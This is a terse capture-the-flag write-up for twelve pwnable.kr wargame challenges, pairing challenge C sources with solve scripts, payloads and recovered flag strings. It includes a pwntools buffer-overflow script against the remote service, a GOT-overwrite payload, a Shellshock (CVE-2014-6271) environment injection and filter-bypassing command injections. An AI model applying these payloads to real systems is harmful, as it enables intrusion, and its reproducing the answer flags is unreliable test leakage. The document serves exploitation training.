1.[fd]
solve
ssh the server.and see three files.fd,fd.c,flag.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char buf[32];
int main(int argc, char* argv[], char* envp[]){
if(argc<2){
printf("pass argv[1] a number\n");
return 0;
}
int fd = atoi( argv[1] ) - 0x1234;
int len = 0;
len = read(fd, buf, 32);
if(!strcmp("LETMEWIN\n", buf)){
printf("good job :)\n");
system("/bin/cat flag");
exit(0);
}
printf("learn about Linux file IO\n");
return 0;
}
it’s say how to make function read to work.
it’s two func,atoi and read.
0x1235=4661
./fd 4661
LETMEWIN\n
flag
mommy! I think I know what a file descriptor is!!
2.collision
solve
from pwn import *
k=p32(h-0x01010101*4)+p32(0x01010101)*4
p=process(['./col',k])
p.interactive()
flag
daddy! I just managed to create a hash collision :)
3.bof
solve
overflow
# encoding=utf-8
from pwn import *
ip='pwnable.kr'
port=9000
p=remote(ip,port)
payload='A'*(0x2c+0x8)+p32(0xcafebabe)
p.sendline(payload)
p.interactive()
4.flag
re
solve
UPX...? sounds like a delivery service :)
5.passcode
use name to change the address of printf to system.
payload = 'A'*96+'\x00\xa0\x04\x08'+'\n'+str(int(0x80485e3))+'\n'
flag
Sorry mom.. I got confused about scanf usage :(
6.random
not real random ,it always 1804289383.
solve
3039230856
flag
Mommy, I thought libc random is unpredictable...
7.input
sourcecode
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <arpa/inet.h>
int main(int argc, char* argv[], char* envp[]){
printf("Welcome to pwnable.kr\n");
printf("Let's see if you know how to give input to program\n");
printf("Just give me correct inputs then you will get the flag :)\n");
// argv
if(argc != 100) return 0;
if(strcmp(argv['A'],"\x00")) return 0;
if(strcmp(argv['B'],"\x20\x0a\x0d")) return 0;
printf("Stage 1 clear!\n");
// stdio
char buf[4];
read(0, buf, 4);
if(memcmp(buf, "\x00\x0a\x00\xff", 4)) return 0;
read(2, buf, 4);
if(memcmp(buf, "\x00\x0a\x02\xff", 4)) return 0;
printf("Stage 2 clear!\n");
// env
if(strcmp("\xca\xfe\xba\xbe", getenv("\xde\xad\xbe\xef"))) return 0;
printf("Stage 3 clear!\n");
// file
FILE* fp = fopen("\x0a", "r");
if(!fp) return 0;
if( fread(buf, 4, 1, fp)!=1 ) return 0;
if( memcmp(buf, "\x00\x00\x00\x00", 4) ) return 0;
fclose(fp);
printf("Stage 4 clear!\n");
// network
int sd, cd;
struct sockaddr_in saddr, caddr;
sd = socket(AF_INET, SOCK_STREAM, 0);
if(sd == -1){
printf("socket error, tell admin\n");
return 0;
}
saddr.sin_family = AF_INET;
saddr.sin_addr.s_addr = INADDR_ANY;
saddr.sin_port = htons( atoi(argv['C']) );
if(bind(sd, (struct sockaddr*)&saddr, sizeof(saddr)) < 0){
printf("bind error, use another port\n");
return 1;
}
listen(sd, 1);
int c = sizeof(struct sockaddr_in);
cd = accept(sd, (struct sockaddr *)&caddr, (socklen_t*)&c);
if(cd < 0){
printf("accept error, tell admin\n");
return 0;
}
if( recv(cd, buf, 4, 0) != 4 ) return 0;
if(memcmp(buf, "\xde\xad\xbe\xef", 4)) return 0;
printf("Stage 5 clear!\n");
// here's your flag
system("/bin/cat flag");
return 0;
}
solve
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/in.h>
int main()
{
/* stage 1 */
char *argv[101] = {0};
for(int i = 1; i<100; ++i)
argv[i] = "a";
argv[0] = "/home/input2/input";
argv['A'] = "\x00";
argv['B'] = "\x20\x0a\x0d";
argv['C'] = "9999"; //server port
argv[100] = NULL;
/* stage 3 */
char *envp[2] = {"\xde\xad\xbe\xef=\xca\xfe\xba\xbe", NULL};
/* stage 4 */ // ! : file open before execve , or the check will fail
FILE *fp = fopen("\x0a", "wb"); // wb,w are similar in linux but differ in win
if(!fp) //see \x0d\x0a in win and \x0a in linux
{
perror("Cannot open file.");
exit(1);
}
printf("open file success.\n");
fwrite("\x00\x00\x00\x00", 4, 1, fp);
fclose(fp);
/* stage 2 */
int pipe_stdin[2] = {-1, -1};
int pipe_stderr[2] = {-1, -1};
pid_t pid_child;
if ( pipe(pipe_stdin) < 0 || pipe(pipe_stderr) < 0 )
{
perror("Cannot create the pipe.");
exit(1);
}
#define STDIN_READ pipe_stdin[0]
#define STDIN_WRITE pipe_stdin[1]
#define STDERR_READ pipe_stderr[0]
#define STDERR_WRITE pipe_stderr[1]
if ( ( pid_child = fork() ) < 0 ) // do not forget the ()!
{
perror("Cannot create fork child.");
exit(1);
}
if( pid_child == 0 )
{
/*child proc*/
sleep(1); //wait to pipe link 0,2
close(STDIN_READ);
close(STDERR_READ);
write(STDIN_WRITE, "\x00\x0a\x00\xff", 4);
write(STDERR_WRITE, "\x00\x0a\x02\xff", 4);
}
else
{
/*parent proc*/
close(STDIN_WRITE);
close(STDERR_WRITE);
dup2(STDIN_READ, 0); //dup to 0-stdin
dup2(STDERR_READ, 2); //dup to 2-stderr
printf("start execve input.\n");
execve("/home/input2/input", argv, envp);
perror("Fail to execute the program");
exit(1);
}
printf("pipe link.\n");
/* stage 5 */
sleep(2); // wait the server start
int sockfd;
char buf[10] = {0}; // buf to be sent
int len; // len of avail buf
struct sockaddr_in servaddr;
servaddr.sin_family = AF_INET;
servaddr.sin_port = htons(9999); // port in argv['C']
servaddr.sin_addr.s_addr = inet_addr("127.0.0.1"); //local
if( (sockfd = socket(PF_INET, SOCK_STREAM, 0)) < 0 )
{
perror("socket error.");
exit(1);
}
if ( connect(sockfd, (struct sockaddr*) &servaddr, sizeof(servaddr)) < 0 )
{
perror("connect error.");
exit(1);
}
printf("socket connect.\n");
strcpy(buf, "\xde\xad\xbe\xef");
len = strlen(buf);
send(sockfd, buf, len, 0);
close(sockfd);
return 0;
}
ln -s /home/input2/flag flag
gcc 1.c -g
./a.out
flag
Mommy! I learned how to pass various input in Linux :)
8.leg
solve
key1=0x8cdc+8
key2=0x8d04+4
key3=0x8d80
flag
My daddy has a lot of ARMv5te muscle!
9.mistake
question
#include <stdio.h>
#include <fcntl.h>
#define PW_LEN 10
#define XORKEY 1
void xor(char* s, int len){
int i;
for(i=0; i<len; i++){
s[i] ^= XORKEY;
}
}
int main(int argc, char* argv[]){
int fd;
if(fd=open("/home/mistake/password",O_RDONLY,0400) < 0){
printf("can't open password %d\n", fd);
return 0;
}
printf("do not bruteforce...\n");
sleep(time(0)%20);
char pw_buf[PW_LEN+1];
int len;
if(!(len=read(fd,pw_buf,PW_LEN) > 0)){
printf("read error\n");
close(fd);
return 0;
}
char pw_buf2[PW_LEN+1];
printf("input password : ");
scanf("%10s", pw_buf2);
// xor your input
xor(pw_buf2, 10);
if(!strncmp(pw_buf, pw_buf2, PW_LEN)){
printf("Password OK\n");
system("/bin/cat flag\n");
}
else{
printf("Wrong Password\n");
}
close(fd);
return 0;
}
solve
open >= 0.so fd=if(0 < open) = 0;
payload
0000000000
1111111111
flag
Mommy, the operator priority always confuses me :(
10.shellshock
CVE-2014-6271
solve
env x='() { :;}; /bin/cat flag' ./shellshock
flag
only if I knew CVE-2014-6271 ten years ago..!!
11.cmd1
question
#include <stdio.h>
#include <string.h>
int filter(char* cmd){
int r=0;
r += strstr(cmd, "flag")!=0;
r += strstr(cmd, "sh")!=0;
r += strstr(cmd, "tmp")!=0;
return r;
}
int main(int argc, char* argv[], char** envp){
putenv("PATH=/thankyouverymuch");
if(filter(argv[1])) return 0;
system( argv[1] );
return 0;
}
solve
./cmd1 "/bin/cat /home/cmd1/fl*"
flag
mommy now I get what PATH environment is for :)
12.cmd2
question
#include <stdio.h>
#include <string.h>
int filter(char* cmd){
int r=0;
r += strstr(cmd, "=")!=0;
r += strstr(cmd, "PATH")!=0;
r += strstr(cmd, "export")!=0;
r += strstr(cmd, "/")!=0;
r += strstr(cmd, "`")!=0;
r += strstr(cmd, "flag")!=0;
return r;
}
extern char** environ;
void delete_env(){
char** p;
for(p=environ; *p; p++) memset(*p, 0, strlen(*p));
}
int main(int argc, char* argv[], char** envp){
delete_env();
putenv("PATH=/no_command_execution_until_you_become_a_hacker");
if(filter(argv[1])) return 0;
printf("%s\n", argv[1]);
system( argv[1] );
return 0;
}
solve
cd /tmp
mkdir xyzzpwn
cd xyzzpwn
echo "/bin/cat /home/cmd2/flag" >xyzz
chmod +x xyzz
cd /
/home/cmd2/cmd2 '$(pwd)tmp$(pwd)xyzzpwn$(pwd)xyzz'
flag
FuN_w1th_5h3ll_v4riabl3s_haha
